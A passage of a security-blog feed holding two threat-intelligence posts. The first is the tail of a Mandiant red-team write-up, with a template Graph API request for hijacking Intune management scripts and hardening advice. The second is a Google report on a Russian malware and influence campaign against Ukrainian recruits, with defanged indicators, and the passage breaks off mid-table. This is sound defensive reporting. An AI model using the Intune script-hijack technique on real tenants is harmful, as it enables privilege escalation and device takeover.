href="https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" rel="noopener" target="_blank">device management scripts</a></span><span style="vertical-align: baseline;"> are custom PowerShell scripts that can run on clients running Windows 10 and later. The ability to run scripts on local devices gives administrators an alternative to configuring devices with settings that are not available under the configuration policies or in the apps part of Intune. Management scripts are executed when the device starts, with administrative privileges (</span><code style="vertical-align: baseline;">NT AUTHORITY\SYSTEM</code><span style="vertical-align: baseline;">).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/intuned-cloud-fig2.max-1000x1000.png" alt="Intune Management Scripts are executed at startup"> </a> <figcaption class="article-image__caption "><p data-block-key="xhotc">Figure 2: Intune management scripts are executed at startup</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission is sufficient to list, read, create and update management scripts through the <a href="https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta" rel="noopener" target="_blank">Microsoft Graph API</a></span><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/intuned-cloud-fig3.max-1000x1000.png" alt="Device Management Scripts can be modified with DeviceManagementConfiguration.ReadWrite.All"> </a> <figcaption class="article-image__caption "><p data-block-key="xhotc">Figure 3: Device management scripts can be modified with DeviceManagementConfiguration.ReadWrite.All</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The management script can easily be created or modified using the Microsoft Graph API. The following figure shows an example HTTP request to modify an existing script.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>PATCH https://graph.microsoft.com/beta/deviceManagement/ deviceManagementScripts/&lt;script id&gt; { "@odata.type": "#microsoft.graph.deviceManagementScript", "displayName": "&lt;display name&gt;", "description": "&lt;description&gt;", "scriptContent": "&lt;PowerShell script in base64 encoding&gt;", "runAsAccount": "system", "enforceSignatureCheck": false, "fileName": "&lt;filename&gt;", "roleScopeTagIds": [ "&lt;existing role scope tags&gt;" ], "runAs32Bit": false }</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Graph API allows the caller to specify the PowerShell script content in Base64-encoded value, along with a display name, file name and description. The </span><span style="font-style: italic; vertical-align: baseline;">runAsAccount </span><span style="vertical-align: baseline;">value can be configured as </span><span style="font-style: italic; vertical-align: baseline;">user</span><span style="vertical-align: baseline;"> or </span><span style="font-style: italic; vertical-align: baseline;">system</span><span style="vertical-align: baseline;">, depending on the principal the script should be executed as. The </span><span style="font-style: italic; vertical-align: baseline;">roleScopeTagIds</span><span style="vertical-align: baseline;"> value references </span><a href="https://learn.microsoft.com/en-us/mem/intune/fundamentals/scope-tags" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Scope Tags</span></a><span style="vertical-align: baseline;">, an Intune mechanism that groups devices and users together. These can also be <a href="https://learn.microsoft.com/en-us/graph/api/intune-rbac-rolescopetag-create?view=graph-rest-beta" rel="noopener" target="_blank">created</a></span><span style="vertical-align: baseline;"> and <a href="https://learn.microsoft.com/en-us/graph/api/intune-rbac-rolescopetagautoassignment-create?view=graph-rest-beta" rel="noopener" target="_blank">managed</a></span><span style="vertical-align: baseline;"> with the </span><span style="vertical-align: baseline;"> </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission. </span></p> <p><span style="vertical-align: baseline;">The </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission allowed Mandiant to move laterally to the PAWs used for Entra ID administration by modifying an existing device management script to execute a Mandiant-controlled PowerShell script. When the device reboots as part of the user’s daily work, the Intune management script is triggered and executes the malicious script. </span></p> <p><span style="vertical-align: baseline;">By launching a command-and-control implant, Mandiant could execute arbitrary commands on the PAWs. The Red Team waited for the victim to activate their privileged role through Azure Privileged Identity Management and impersonated the privileged account (e.g., through cookie or token theft), thereby obtaining privileged access to Entra ID. These steps allowed Mandiant to obtain </span><span style="font-style: italic; vertical-align: baseline;">Global Administrator</span><span style="vertical-align: baseline;"> privileges in Entra ID, completing the objective of this assessment.</span></p> <h2><span style="vertical-align: baseline;">Remediation and Recommendations</span></h2> <p><span style="vertical-align: baseline;">Mandiant recommends the following hardening recommendations to prevent the attack scenario:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Review your organization’s security principals for the </strong><strong style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</strong><strong style="vertical-align: baseline;"> permission:</strong> <span style="vertical-align: baseline;">Organizations using Microsoft Intune for device management should treat the </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission as sensitive, as it gives the trustee a control relationship over the Intune-managed devices, and by extension, any identities associated with the device. <br/></span><span style="vertical-align: baseline;"><br/>Mandiant recommends organizations to regularly review the permissions granted to Azure service principals, paying special attention to the </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission, as well as other sensitive permissions (e.g., </span><span style="font-style: italic; vertical-align: baseline;">RoleManagement.ReadWrite.Directory</span><span style="vertical-align: baseline;">, </span><span style="font-style: italic; vertical-align: baseline;">AppRoleAssignment.ReadWrite.All</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">Application.ReadWrite.All).<br/><br/></span><span style="vertical-align: baseline;">Organizations that use Intune to manage PAWs should be especially careful delegating Intune privileges (either through </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> or through Entra roles such as </span><span style="font-style: italic; vertical-align: baseline;">Intune Role Administrator</span><span style="vertical-align: baseline;">).</span></p> </li> <li role="presentation"><strong style="vertical-align: baseline;">Enable multiple admin approval for Intune:</strong> <span style="vertical-align: baseline;">Intune supports </span><a href="https://learn.microsoft.com/en-us/mem/intune/fundamentals/multi-admin-approval" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">using Access Policies</span></a><span style="vertical-align: baseline;"> to require a second administrator to approve any changes before a change is applied. This would prevent an attacker from creating or modifying management scripts with a single compromised account.</span></li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Consider enabling Microsoft Graph API activity logs:</strong><span style="vertical-align: baseline;"> Enablement of </span><a href="https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Graph API Activity logs</span></a><span style="vertical-align: baseline;"> can help in detection and response endeavors providing detailed information about Graph API HTTP requests made to Microsoft Graph resources.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Utilize capabilities provided by Workload ID Premium licenses:</strong> <span style="vertical-align: baseline;">When licensed for </span><a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identity" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Workload-ID Premium</span></a><span style="vertical-align: baseline;"> Mandiant recommends leveraging these capabilities to:</span></p> <ul> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Restrict privileged service principal usage from known trusted locations only. This limits the risk of unauthorized access and strengthens security by ensuring the use only from trusted locations. </span></span></span></span></span></li> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Enhance the security of service principals by enabling risk detections in Microsoft Identity Protection. This can proactively block access when suspicious activities or risk factors are identified.</span></span></span></li> </ul> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"><strong style="vertical-align: baseline;">Proactively monitor service principal sign-ins:</strong> <span style="vertical-align: baseline;">Proactively monitoring sign-ins from service principals can help detect anomalies and potential threats. Integrate this data into security operations to trigger alerts and enable rapid response to unauthorized access attempts</span><span style="vertical-align: baseline;">.</span></li> </ol> <p><span style="vertical-align: baseline;">Through numerous adversarial emulation engagements, Red Team Assessments, and Purple Team Assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their target’s cloud estate. Review our </span><a href="https://cloud.google.com/security/consulting/mandiant-technical-assurance"><span style="text-decoration: underline; vertical-align: baseline;">Technical Assurance</span></a><span style="vertical-align: baseline;"> services and </span><a href="https://www.mandiant.com/contact-us" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">contact us</span></a><span style="vertical-align: baseline;"> for more information.</span></p></div></description><pubDate>Wed, 06 Nov 2024 05:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>(In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives</title><link>https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In September 2024, Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant) discovered UNC5812, a suspected Russian hybrid espionage and influence operation, delivering Windows and Android malware using a Telegram persona named "Civil Defense". "Civil Defense" claims to be a provider of free software programs designed to enable potential conscripts to view and share crowdsourced locations of Ukrainian military recruiters. If installed with Google Play Protect disabled, these programs deliver an operating system-specific commodity malware variant to the victim alongside a decoy mapping application we track as SUNSPINNER. In addition to using its Telegram channel and website for malware delivery, UNC5812 is also actively engaged in influence activity, delivering narratives and soliciting content intended to undermine support for Ukraine's mobilization efforts.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig1.max-1000x1000.png" alt="UNC5812’s “Civil Defense” persona"> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 1: UNC5812’s "Civil Defense" persona</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Targeting Users on Telegram</span></h2> <p><span style="vertical-align: baseline;">UNC5812’s malware delivery operations are conducted both via an actor-controlled Telegram channel </span><code><span style="vertical-align: baseline;">@civildefense_com_ua</span></code><span style="vertical-align: baseline;"> and website hosted at </span><code><span style="vertical-align: baseline;">civildefense[.]com.ua</span></code><span style="vertical-align: baseline;">. The associated website was registered in April 2024, but the Telegram channel was not created until early September 2024, which we judge to be when UNC5812’s campaign became fully operational. To drive potential victims towards these actor-controlled resources, we assess that UNC5812 is likely purchasing promoted posts in legitimate, established Ukrainian-language Telegram channels. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">On September 18th 2024, a legitimate channel with over 80,000 subscribers dedicated to missile alerts was observed promoting the "Civil Defense" Telegram channel and website to its subscribers. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">An additional Ukrainian-language news channel promoting Civil Defense’s posts as recently as October 8th, indicating the campaign is probably still actively seeking new Ukrainian-language communities for targeted engagement.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Channels where "Civil Defense" posts have been promoted advertise the ability to reach out to their administrations for sponsorship opportunities. We suspect this is the likely vector that UNC5812 is using to approach the respective legitimate channels to increase the operation’s reach.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig2.max-1000x1000.png" alt="Civil Defense promoted in Ukrainian-language missile alert and news communities."> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 2: Civil Defense promoted in Ukrainian-language missile alert and news communities</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The ultimate aim of the campaign is to have victims navigate to the UNC5812-controlled "Civil Defense" website, which advertises several different software programs for different operating systems. When installed, these programs result in the download of various commodity malware families. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For Windows users, the website delivers a downloader tracked publicly as </span><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pronsis Loader</span></a><span style="vertical-align: baseline;"> that is written in PHP that is compiled into Java Virtual machine (JVM) bytecode using the open source </span><a href="https://github.com/jphp-group/jphp" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">JPHP project</span></a><span style="vertical-align: baseline;">. When executed, Prosnis Loader initiates a convoluted malware delivery chain, ultimately delivering SUNSPINNER and a commodity information stealer commonly known as PURESTEALER. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For Android users, the malicious APK file attempts to install a variant of the commercially available Android backdoor CRAXSRAT. Different versions of this payload were observed, including a variant containing SUNSPINNER in addition to the CRAXSRAT payload. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While the Civil Defense website also advertises support for macOS and iPhones, only Windows and Android payloads were available at the time of analysis. </span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig3.max-1000x1000.png" alt="Download page, translated from Ukrainian"> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 3: Download page, translated from Ukrainian</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Notably, the Civil Defense website also contains an unconventional form of social engineering designed to preempt user suspicions about APK delivery outside of the App Store and justify the extensive permissions required for the CRAXSRAT installation. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The website’s FAQ contains a strained justification for the Android application being hosted outside the App Store, suggesting it is an effort to "protect the anonymity and security" of its users, and directing them to a set of accompanying video instructions. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Ukrainian-language video instructions then guide victims on how to disable Google Play Protect, the service used to check applications for harmful functionality when they are installed on Android devices, as well as to manually enable all permissions once the malware is successfully installed. </span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig4.max-1000x1000.png" alt="Screenshots of video instructions to turn off Google Play Protect and manually enable CRAXSRAT permissions"> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 4: Screenshots of video instructions to turn off Google Play Protect and manually enable CRAXSRAT permissions</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Anti-Mobilization Influence Operation</span></h2> <p><span style="vertical-align: baseline;">In parallel to its efforts to deliver malware and gain access to the devices of potential military recruits, UNC5812 is also engaged in influence activity to undermine Ukraine's wider mobilization and military recruitment efforts. The group's Telegram channel is actively used to solicit visitors and subscribers to upload videos of "unfair actions from territorial recruitment centers," content that we judge likely to be intended for follow-on exposure to reinforce UNC5812's anti-mobilization narratives and discredit the Ukrainian military. Clicking on the "Send Material" (Ukrainian: Надіслати матеріал) button opens a chat thread with an attacker-controlled </span><span style="vertical-align: baseline;"><code>https://t[.]me/UAcivildefenseUA</code> </span><span style="vertical-align: baseline;">account.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Civil Defense website is also interspersed with Ukrainian-language anti-mobilization imagery and content, including a dedicated news section to highlight purported cases of unjust mobilization practices. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Anti-mobilization content cross-posted to the group's website and Telegram channel appears to be sourced from wider pro-Russian social media ecosystems. In at least one instance, a video shared by UNC5812 was shared a day later by the Russian Embassy on South Africa's X account.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig5.max-1000x1000.png" alt="UNC5812&#x27;s Telegram and a Russian government X account sharing the same video in close proximity, highlighting their shared focus on anti-mobilization narratives"> </a> <figcaption class="article-image__caption "><p data-block-key="n3t5d">Figure 5: UNC5812's Telegram and a Russian government X account sharing the same video in close proximity, highlighting their shared focus on anti-mobilization narratives</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Malware Analysis</span></h2> <p><span style="vertical-align: baseline;">UNC5812 operates two unique malware delivery chains for Windows and Android devices that are delivered from the group's website hosted at civildefense[.]com[.]ua. Common between these distinct delivery chains is the parallel delivery of a decoy mapping application tracked as SUNSPINNER, which displays to users a map that renders purported locations of Ukrainian military recruits from an actor-controlled command-and-control (C2) server.</span></p> <h3><span style="vertical-align: baseline;">SUNSPINNER</span></h3> <p><span style="vertical-align: baseline;">SUNSPINNER (MD5: 4ca65a7efe2e4502e2031548ae588cb8) is a decoy graphical user interface (GUI) application written using the Flutter framework and compiled for both Windows and Android environments. When executed, SUNSPINNER attempts to resolve a new "backend server" hostname from </span><code style="vertical-align: baseline;">http://h315225216.nichost[.]ru/itmo2020/Student/map_markers/mainurl.json</code><span style="vertical-align: baseline;">, followed by a request for map markers from </span><code style="vertical-align: baseline;">https://fu-laravel.onrender[.]com/api/markers</code><span style="vertical-align: baseline;"> that are then rendered on the app's GUI.</span></p> <p><span style="vertical-align: baseline;">Consistent with the functionality advertised on the Civil Defense website, SUNSPINNER is capable of displaying crowdsourced markers with the locations of the Ukrainian military recruiters, with an option for users to add their own markers. However, despite possessing the limited functionality required for users to register and add markers, the displayed map does not appear to have any genuine user inputs. All markers present in the JSON file pulled from SUNSPINNER's C2 infrastructure were added on the same day by the same user. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig6.max-1000x1000.png" alt="Decoy application for monitoring the locations of Ukrainian military recruitment staff"> </a> <figcaption class="article-image__caption "><p data-block-key="n3t5d">Figure 6: Decoy application for monitoring the locations of Ukrainian military recruitment staff</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Windows — Pronsis Loader to PURESTEALER</span></h3> <p><span style="vertical-align: baseline;">The Windows payload downloaded from the Civil Defense website, </span><code style="vertical-align: baseline;">CivilDefense.exe</code><span style="vertical-align: baseline;"> (MD5: 7ef871a86d076dac67c2036d1bb24c39), is a custom build of </span><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pronsis Loader</span></a><span style="vertical-align: baseline;">, a recently discovered commodity malware being operated primarily by financially motivated threat actors. </span></p> <p><span style="vertical-align: baseline;">Pronsis Loader is used to retrieve both the decoy SUNSPINNER binary and a second-stage downloader "civildefensestarter.exe" (MD5: d36d303d2954cb4309d34c613747ce58), initiating a multi-stage delivery chain using a series self-extracting archives, which ultimately executes PURESTEALER on the victim device. The second-stage downloader is written in PHP and is compiled into Java Virtual machine (JVM) bytecode using the open-source </span><a href="https://github.com/jphp-group/jphp" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">JPHP project</span></a><span style="vertical-align: baseline;"> and then built as a Windows executable file. This file is automatically executed by the CivilDefense installer. </span></p> <p><span style="vertical-align: baseline;">The final payload is PURESTEALER (MD5: b3cf993d918c2c61c7138b4b8a98b6bf</span><span style="vertical-align: baseline;">)</span><span style="vertical-align: baseline;">, a heavily obfuscated commodity infostealer written in .NET that is designed to steal browser data, such as passwords and cookies, cryptocurrency wallets, and from various other applications such as messaging and email clients. PURESTEALER is offered for sale by "Pure Coder Team" with prices ranging from $150 for a monthly subscription to $699 for a lifetime license.</span></p> <h3><span style="vertical-align: baseline;">Android — CraxsRAT</span></h3> <p><span style="vertical-align: baseline;">The Android Package (APK) file downloaded from the Civil Defense website "CivilDefensse.apk" (MD5: 31cdae71f21e1fad7581b5f305a9d185) is a variant of the commercially available Android backdoor CRAXSRAT. CRAXSRAT provides functionality typical of a standard Android backdoor, to include file management, SMS management, contact and credential harvesting, and a series of monitoring capabilities for location, audio, and keystrokes. Similar to PURESTEALER, it's also available for sale on underground forums.</span></p> <p><span style="vertical-align: baseline;">The Android sample being distributed at the time of analysis only displayed a splash screen with the "Civil Defense" logo. However, an additional identified sample (MD5: aab597cdc5bc02f6c9d0d36ddeb7e624) was found to contain the same SUNSPINNER decoy application as in the Windows delivery chain. When opened, this version requests the Android REQUEST_INSTALL_PACKAGES permission from the user, which if granted, downloads the CRAXSRAT payload from </span><code style="vertical-align: baseline;">http://h315225216.nichost[.]ru/itmo2020/Student/map_markers/CivilDefense.apk</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig7.max-1000x1000.png" alt="Error message displayed if the user doesn’t grant REQUEST_INSTALL_PACKAGES permission"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: Error message displayed if the user doesn’t grant </span><code style="font-style: italic; vertical-align: baseline;">REQUEST_INSTALL_PACKAGES</code><span style="vertical-align: baseline;"> permission</span></span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Protecting Our Users</span></h2> <p><span style="vertical-align: baseline;">As part of our efforts to combat serious threat actors, we use the results of our research to improve the safety and security of Google’s products. Upon discovery, all identified websites, domains and files are added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safe Browsing</span></a><span style="vertical-align: baseline;"> to protect users from further exploitation. </span></p> <p><span style="vertical-align: baseline;">Google also continuously monitors for Android spyware, and we deploy and constantly update protections in </span><a href="https://support.google.com/accounts/answer/2812853" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Play Protect</span></a><span style="vertical-align: baseline;">, which offers users protection in and outside of Google Play, checking devices for potentially harmful apps regardless of the install source. Notably, UNC5812's Civil Defense website specifically included social engineering content and detailed video instructions on how the targeted user should turn off Google Play Protect and manually enable Android permissions required by CRAXSRAT in order to function. Safe Browsing also protects Chrome users on Android by showing them warnings before they visit dangerous sites. App scanning infrastructure protects Google Play and powers Verify Apps to additionally protect users who install apps from outside Google Play. </span></p> <p><span style="vertical-align: baseline;">We have also shared our findings with Ukraine's national authorities who have taken action to disrupt the campaign's reach by blocking resolution of the actor-controlled "Civil Defense" website nationally.</span></p> <h2><span style="vertical-align: baseline;">Summary</span></h2> <p><span style="vertical-align: baseline;">UNC5812's hybrid espionage and information operation against potential Ukrainian military recruits is part of a wider spike in operational interest from Russian threat actors following changes made to Ukraine's national mobilization laws in 2024. In particular, we have seen the targeting of potential military recruits rise in prominence following the launch of Ukraine's national digital military ID used to manage the details of those liable for military service and boost recruitment. Consistent with research from </span><a href="https://euvsdisinfo.eu/how-russian-special-information-operations-try-to-undermine-mobilisation-in-ukraine/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">EUvsDisinfo</span></a><span style="vertical-align: baseline;">, we also continue to observe persistent efforts by pro-Russia influence actors to promote messaging undermining Ukraine's mobilization drive and sowing public distrust in the officials carrying it out.</span></p> <p><span style="vertical-align: baseline;">From a tradecraft perspective, UNC5812's campaign is highly characteristic of the emphasis Russia places on achieving cognitive effect via its cyber capabilities, and highlights the prominent role that messaging apps continue to play in malware delivery and other cyber dimensions of Russia's war in Ukraine. We judge that as long as Telegram continues to be a critical source of information during the war, it is almost certain to remain a primary vector for cyber-enabled activity for a range of Russian-linked espionage and influence activity. </span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise</span></h2> <p><span style="vertical-align: baseline;">For a more comprehensive set of UNC5812 indicators of compromise, a <a href="https://www.virustotal.com/gui/collection/ac6aa44201d5619ffa0b038f1431c7ab52ca826dee65a9bb457456c7b76007a4/" rel="noopener" target="_blank">Google Threat Intelligence Collection</a> is available for registered users.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Indicators of Compromise</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Context</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">civildefense[.]com[.]ua</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5812 landing page</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">t[.]me/civildefense_com_ua</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5812 Telegram channel</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">t[.]me/UAcivildefenseUA</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5812 Telegram account</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">e98ee33466a270edc47fdd9faf67d82e</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SUNSPINNER decoy</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">h315225216.nichost[.]ru</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Resolver used in SUNSPINNER decoy</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">fu-laravel.onrender[.]com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hostname used in SUNSPINNER decoy</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 